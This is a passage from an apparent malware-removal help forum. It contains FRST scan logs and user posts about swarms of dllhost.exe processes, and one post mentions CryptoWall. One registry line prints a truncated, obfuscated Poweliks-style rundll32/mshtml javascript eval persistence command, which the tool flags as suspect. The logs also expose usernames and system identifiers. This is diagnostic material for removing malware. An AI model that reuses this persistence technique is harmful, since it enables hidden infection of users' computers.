(HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{9CFD026D-EB1C-48C2-9DD2-8E8875F251B2}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2825640) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{BA610006-2C39-4419-9834-CF61AB24810A}) (Version: - Microsoft) Update for Microsoft OneNote 2010 (KB2553290) 32-Bit Edition (HKLM-x32\...\{90140000-00A1-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{9865DC3A-2898-48D9-B96A-46397571C934}) (Version: - Microsoft) Update for Microsoft OneNote 2010 (KB2810072) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{3EFF1957-7DEA-4C7A-8E9C-2D6D58E4B2ED}) (Version: - Microsoft) Update for Microsoft OneNote 2010 (KB2810072) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{3EFF1957-7DEA-4C7A-8E9C-2D6D58E4B2ED}) (Version: - Microsoft) Update for Microsoft Outlook 2010 (KB2687623) 32-Bit Edition 
(HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{47894754-0FEC-4920-9A65-6C1E732587AC}) (Version: - Microsoft) Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{1EEFF749-6F29-4F0B-AB08-4C6EA52AA110}) (Version: - Microsoft) Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{BC6DFBFD-16DD-47E1-A7EF-2C062930FA4F}) (Version: - Microsoft) Update for Microsoft PowerPoint 2010 (KB2553145) 32-Bit Edition (HKLM-x32\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{DA2F7ECE-6629-4A80-9CDE-EC95261B75E2}) (Version: - Microsoft) Update for Microsoft PowerPoint 2010 (KB2553145) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{190EC86F-5867-4D7A-B9F3-D14D82C26F3D}) (Version: - Microsoft) Update for Microsoft SharePoint Workspace 2010 (KB2589371) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{5DA2D071-A54C-47C0-83E5-43C63DBFD936}) (Version: - Microsoft) Update for Microsoft SharePoint Workspace 2010 (KB2589371) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{5DA2D071-A54C-47C0-83E5-43C63DBFD936}) (Version: - Microsoft) Update for Microsoft Visio Viewer 2010 (KB2810066) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{8C55AA83-54C2-4236-A622-78440A411DC5}) (Version: - Microsoft) Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation) Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation) Visual Studio Tools for the 
Office system 3.0 Runtime (x32 Version: 9.0.30729 - Microsoft Corporation) Hidden
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.9.3 - WildTangent) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2604008792-1424924497-987845697-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points =========================

25-09-2014 00:23:43 Scheduled Checkpoint
06-10-2014 01:25:19 Scheduled Checkpoint
08-10-2014 14:09:56 Restore Operation
08-10-2014 20:17:22 before dllrepair
16-10-2014 18:44:31 Scheduled Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2012-07-26 01:26 - 2012-07-26 01:26 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {08FB183D-EA25-418D-9C44-B3C88CB231CD} - System32\Tasks\iuEmailOutlookAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe [2012-08-22] ()
Task: {1AAFF332-5C62-4558-9991-DAA649C4C9C5} - System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask => Rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
Task: {1CA5824F-E16C-4217-9D91-9EB83FC6C33D} - System32\Tasks\PMMUpdate => C:\Program Files\EgisTec IPS\PMMUpdate.exe [2012-07-11] (Egis Technology Inc.)
Task: {20B1DCDB-6B19-4FFF-B643-CCAB878B672E} - System32\Tasks\EPSON XP-310 Series Update {901D3D34-B261-4978-B173-D1F87C7D7DE3} => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLBE.EXE [2013-02-28] (SEIKO EPSON CORPORATION)
Task: {22CF35EA-EB57-4E66-90C9-5DEA2818D506} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTray.exe [2012-10-23] (Acer Incorporated)
Task: {23A5D8BE-9196-40EB-BD89-794398B2B073} - System32\Tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask => Rundll32.exe WSClient.dll,RefreshBannedAppsList
Task: {3605355B-5E7F-4866-B77F-145975D92514} - System32\Tasks\ALU => C:\Program Files (x86)\Acer\Live Updater\updater.exe [2012-11-06] ()
Task: {4C3770B4-6FBD-4A9F-AA90-2A2F43948E15} - System32\Tasks\EPSON XP-310 Series Invitation {901D3D34-B261-4978-B173-D1F87C7D7DE3} => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLBE.EXE [2013-02-28] (SEIKO EPSON CORPORATION)
Task: {50350250-5281-4567-9FAA-ED2C60157088} - System32\Tasks\Microsoft\Windows\Setup\Pre-staged GDR Notification => C:\Windows\system32\NotificationUI.exe [2013-08-16] (Microsoft Corporation)
Task: {6F383F9A-7EB9-430E-9E58-1EA32C90E00F} - System32\Tasks\Leader Technologies\LTCM Client\New Message Check - jalockma => C:\Program Files (x86)\LTCM Client\ltcmClient.exe [2011-04-07] (Leader Technologies Inc.)
Task: {80991203-C778-4A39-B0ED-A50B2C3B75D2} - System32\Tasks\ALUAgent => C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe [2012-06-21] ()
Task: {97A9A43C-E344-45D4-876D-D2BD5F4D9CB6} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2012-09-19] (CyberLink)
Task: {A72208BF-7A49-4FB8-B684-252375F3443A} - System32\Tasks\Microsoft\Windows\WS\License Validation => Rundll32.exe WSClient.dll,WSpTLR licensing
Task: {C3D4C166-5A10-466B-B24D-212915BA7263} - System32\Tasks\iuBrowserIEAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe [2012-08-22] ()
Task: {C6A88F2D-53D2-4805-9D69-443738A1847C} - System32\Tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState => Rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
Task: {E9727A2B-0E3C-4782-B4F4-3E448FA9A8C0} - System32\Tasks\EgisUpdate => C:\Program Files\EgisTec IPS\EgisUpdate.exe [2012-07-11] (Egis Technology Inc.)
Task: {EBF06DEC-4228-4813-AC0C-62821AE4E330} - System32\Tasks\Microsoft\Windows\Application Experience\StartupAppTask => Rundll32.exe Startupscan.dll,SusRunTask
Task: C:\Windows\Tasks\EPSON XP-310 Series Invitation {901D3D34-B261-4978-B173-D1F87C7D7DE3}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLBE.EXE
Task: C:\Windows\Tasks\EPSON XP-310 Series Update {901D3D34-B261-4978-B173-D1F87C7D7DE3}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLBE.EXE

==================== Loaded Modules (whitelisted) =============

2011-03-17 00:07 - 2011-03-17 00:07 - 04297568 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2012-06-21 22:12 - 2012-06-21 22:12 - 01407568 _____ () C:\Program Files (x86)\EgisTec MyWinLocker\x64\LIBEAY32.dll
2014-04-16 23:31 - 2014-04-16 23:32 - 00176048 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe\ModernShared\ErrorReporting\ErrorReporting.dll
2012-08-22 19:04 - 2012-08-22 19:04 - 00044176 _____ () C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe
2012-08-22 19:04 - 2012-08-22 19:04 - 00025232 _____ () C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe
2012-11-02 20:38 - 2012-11-02 20:38 - 00465384 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\sqlite3.dll
2012-11-02 20:37 - 2012-11-02 20:37 - 00125504 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\MailConverter32.dll
2012-11-02 20:38 - 2012-11-02 20:38 - 00155712 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\VolumeSnapshot.dll
2012-11-02 20:37 - 2012-11-02 20:37 - 00118336 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\Online.dll
2012-11-02 20:37 - 2012-11-02 20:37 - 01081408 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\ACE.dll
2012-11-02 20:37 - 2012-11-02 20:37 - 00052288 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\OsSettingPort.dll
2012-11-02 20:37 - 2012-11-02 20:37 - 00727616 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\OutlookShadow.dll
2013-01-26 10:00 - 2012-06-24 22:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll
2011-03-17 00:11 - 2011-03-17 00:11 - 04297568 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk" HKLM\...\StartupApproved\Run: => "BtPreLoad" HKLM\...\StartupApproved\Run: => "ETDCtrl" HKLM\...\StartupApproved\Run: => "RtHDVBg_Dolby" HKLM\...\StartupApproved\Run: => "HotKeysCmds" HKLM\...\StartupApproved\Run: => "IgfxTray" HKLM\...\StartupApproved\Run: => "Persistence" HKLM\...\StartupApproved\Run: => "RtHDVCpl" HKLM\...\StartupApproved\Run: => "TelevisionFanatic Home Page Guard 64 bit" HKLM\...\StartupApproved\Run32: => "Dolby Home Theater v4" HKLM\...\StartupApproved\Run32: => "Norton Online Backup" HKLM\...\StartupApproved\Run32: => "Adobe ARM" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "BCSSync" HKLM\...\StartupApproved\Run32: => "ApnTBMon" HKLM\...\StartupApproved\Run32: => "mcpltui_exe" HKLM\...\StartupApproved\Run32: => "EEventManager" HKLM\...\StartupApproved\Run32: => "LTCM Client" HKLM\...\StartupApproved\Run32: => "TelevisionFanatic Browser Plugin Loader 64" HKLM\...\StartupApproved\Run32: => "TelevisionFanatic Browser Plugin Loader" HKLM\...\StartupApproved\Run32: => "TelevisionFanatic Search Scope Monitor" HKLM\...\StartupApproved\Run32: => "TelevisionFanatic EPM Support" HKCU\...\StartupApproved\StartupFolder: => "OneNote 2010 Screen Clipper and Launcher.lnk" HKCU\...\StartupApproved\Run: => "Spotify Web Helper" HKCU\...\StartupApproved\Run: => "EPLTarget\P0000000000000000" HKCU\...\StartupApproved\Run: => "AppDataLow" ========================= Accounts: ========================== Administrator (S-1-5-21-2604008792-1424924497-987845697-500 - Administrator - Disabled) Guest (S-1-5-21-2604008792-1424924497-987845697-501 - Limited - Disabled) jalockma (S-1-5-21-2604008792-1424924497-987845697-1001 - Administrator - Enabled) => C:\Users\jalockma ==================== Faulty Device Manager Devices 
============= Name: Bluetooth USB Module Description: Bluetooth USB Module Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974} Manufacturer: Qualcomm Atheros Communications Service: BTHUSB Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ========================= Application errors: ================== Error: (10/17/2014 11:09:44 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: BtvStack.exe, version: 8.0.0.220, time stamp: 0x51061e13 Faulting module name: audio.dll, version: 8.0.0.220, time stamp: 0x51061de7 Exception code: 0xc0000005 Fault offset: 0x000000000001aed8 Faulting process id: 0x2278 Faulting application start time: 0xBtvStack.exe0 Faulting application path: BtvStack.exe1 Faulting module path: BtvStack.exe2 Report Id: BtvStack.exe3 Faulting package full name: BtvStack.exe4 Faulting package-relative application ID: BtvStack.exe5 Error: (10/17/2014 07:48:48 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerLaptop) Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information. 
Error: (10/17/2014 07:47:06 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16688, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e Exception code: 0xc0000005 Fault offset: 0x000618d0 Faulting process id: 0xf50 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (10/17/2014 07:46:03 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16688, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e Exception code: 0xc0000005 Fault offset: 0x000618d0 Faulting process id: 0x24c8 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (10/17/2014 07:43:06 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16688, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e Exception code: 0xc0000005 Fault offset: 0x000618d0 Faulting process id: 0x2b98 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (10/17/2014 07:42:48 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16688, time stamp: 0x5010888a Faulting module 
name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e Exception code: 0xc0000005 Fault offset: 0x000618d0 Faulting process id: 0x26a8 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (10/17/2014 07:29:07 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: BtvStack.exe, version: 8.0.0.220, time stamp: 0x51061e13 Faulting module name: audio.dll, version: 8.0.0.220, time stamp: 0x51061de7 Exception code: 0xc0000005 Fault offset: 0x000000000001aed8 Faulting process id: 0x464 Faulting application start time: 0xBtvStack.exe0 Faulting application path: BtvStack.exe1 Faulting module path: BtvStack.exe2 Report Id: BtvStack.exe3 Faulting package full name: BtvStack.exe4 Faulting package-relative application ID: BtvStack.exe5 Error: (10/16/2014 10:30:08 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: BtvStack.exe, version: 8.0.0.220, time stamp: 0x51061e13 Faulting module name: audio.dll, version: 8.0.0.220, time stamp: 0x51061de7 Exception code: 0xc0000005 Fault offset: 0x000000000001aed8 Faulting process id: 0x10dc Faulting application start time: 0xBtvStack.exe0 Faulting application path: BtvStack.exe1 Faulting module path: BtvStack.exe2 Report Id: BtvStack.exe3 Faulting package full name: BtvStack.exe4 Faulting package-relative application ID: BtvStack.exe5 Error: (10/16/2014 05:39:03 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16688, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e Exception code: 0xc0000005 Fault offset: 0x000618d0 Faulting process id: 0x21a4 Faulting application start time: 0xiexplore.exe0 Faulting 
application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (10/16/2014 05:36:01 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16688, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e Exception code: 0xc0000005 Fault offset: 0x000618d0 Faulting process id: 0x2108 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 System errors: ============= Error: (10/17/2014 11:21:28 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 11:20:57 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 11:20:08 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 11:19:15 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 11:18:43 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 08:00:20 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 07:59:48 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 07:59:17 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 07:58:45 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: 
{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 07:58:14 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Microsoft Office Sessions: ========================= Error: (10/17/2014 11:09:44 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: BtvStack.exe8.0.0.22051061e13audio.dll8.0.0.22051061de7c0000005000000000001aed8227801cfea0111472afaC:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exeC:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\Modules\Audio\audio.dll9fb7403f-560f-11e4-be8b-7054d2a67f49 Error: (10/17/2014 07:48:48 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerLaptop) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2144927141 Error: (10/17/2014 07:47:06 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe10.0.9200.166885010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0f5001cfea0009b7be32C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll5136fee4-55f3-11e4-be8b-7054d2a67f49 Error: (10/17/2014 07:46:03 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe10.0.9200.166885010888antdll.dll6.2.9200.16578515fac6ec0000005000618d024c801cfe9ffe206b2a0C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll2bcb3da0-55f3-11e4-be8b-7054d2a67f49 Error: (10/17/2014 07:43:06 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe10.0.9200.166885010888antdll.dll6.2.9200.16578515fac6ec0000005000618d02b9801cfe9ff7a2e6911C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dllc211d3df-55f2-11e4-be8b-7054d2a67f49 Error: (10/17/2014 07:42:48 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe10.0.9200.166885010888antdll.dll6.2.9200.16578515fac6ec0000005000618d026a801cfe9ff6fe8c9a5C:\Program Files\Internet 
Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dllb78f9631-55f2-11e4-be8b-7054d2a67f49 Error: (10/17/2014 07:29:07 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: BtvStack.exe8.0.0.22051061e13audio.dll8.0.0.22051061de7c0000005000000000001aed846401cfe9fd854ef786C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exeC:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\Modules\Audio\audio.dllcdda008b-55f0-11e4-be8b-7054d2a67f49 Error: (10/16/2014 10:30:08 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: BtvStack.exe8.0.0.22051061e13audio.dll8.0.0.22051061de7c0000005000000000001aed810dc01cfe9b231253886C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exeC:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\Modules\Audio\audio.dll8292bb1b-55a5-11e4-be8b-7054d2a67f49 Error: (10/16/2014 05:39:03 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe10.0.9200.166885010888antdll.dll6.2.9200.16578515fac6ec0000005000618d021a401cfe98993161676C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dlld85da38f-557c-11e4-be8a-2016d8aa05dc Error: (10/16/2014 05:36:01 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe10.0.9200.166885010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0210801cfe988f85dca86C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll6c17933e-557c-11e4-be8a-2016d8aa05dc CodeIntegrity Errors: =================================== Date: 2014-03-14 17:09:42.065 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\WindowsApps\TuneIn.TuneInRadio_1.0.1.587_neutral__6bhtb546zcxnj\TuneIn.exe) attempted to load \Device\HarddiskVolume4\Program Files\WindowsApps\TuneIn.TuneInRadio_1.0.1.587_neutral__6bhtb546zcxnj\Funq.dll with signing level Unsigned while the system requires signing level 6 or better to load. 
==================== Memory info =========================== Processor: Intel® Pentium® CPU B960 @ 2.20GHz Percentage of memory in use: 47% Total physical RAM: 3912.27 MB Available physical RAM: 2065.02 MB Total Pagefile: 15688.27 MB Available Pagefile: 13693.68 MB Total Virtual: 8192 MB Available Virtual: 8191.78 MB ==================== Drives ================================ Drive c: (Acer) (Fixed) (Total:447.95 GB) (Free:379.01 GB) NTFS Drive e: () (Removable) (Total:3.72 GB) (Free:1.79 GB) FAT32 ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 465.8 GB) (Disk ID: F46FED94) Partition: GPT Partition Type. ======================================================== Disk: 1 (MBR Code: Windows XP) (Size: 3.7 GB) (Disk ID: A2ABA2AB) Partition 1: (Not Active) - (Size=3.7 GB) - (Type=0B) ==================== End Of Log ============================ FRST.txt Addition.txt
  6. Hi, I've been having a problem with dllhost.exe*32 starting tens of instances and restarting every few minutes after I have ended the correct process tree. This seems to need a personal fix, and it is an urgent matter for me to get my computer fixed ASAP, so any help would be extremely kind. Thank you for reading this and maybe helping out! Here are the FRST scans of my computer. If anything else is needed, I'll be happy to oblige. FRST.txt Addition.txt
  7. I have multiple instances of this running on my computer and hogging up resources. They seem to be trying to launch IE browser sites. I ran a Malwarebytes scan but it says everything is clean. These dll processes come on at startup even before I launch anything. Malwarebytes says it's blocking the website and I exclude it but the multiple processes still show up. My computer is very slow. I also ran Trend Micro Office Scan Antivirus and it found and quarantined three files but the processes still keep showing up.
  8. Hi, There! I was struck by the dreaded CryptoWall ransomware. I first knew something was wrong when I noticed 20 to 30 instances of COM Surrogate (32 bit)/dllhost.exe popping up and running at once. A few days later, I found the 3 files left behind in each folder where files were encrypted. Thanks to Malwarebytes Anti-Malware, I was able to remove CryptoWall. Since Windows Defender had let the virus through, I switched to Avast, along with purchasing the premium version of MWBAM. Now, I still notice both MWBAM and Avast popping up with prevention notifications, even while I'm not starting/clicking on anything. I've also noticed the COM Surrogates popping up on occasion. Sometimes, the machine behaves normally for a while. I believe that Avast and MWBAM are preventing these processes from doing anything bad, but I have no way of knowing. At a minimum, they impact performance, so I use Task Manager to end them as they come up. I appreciate any assistance you can provide. FRST.txt: Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 23-09-2014 Ran by Kulle (administrator) on OFFICE_PC on 23-09-2014 13:34:45 Running from C:\Users\Kulle\Desktop Platform: Windows 8 (X64) OS Language: English (United States) Internet Explorer Version 10 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe () C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe (Apple Inc.) 
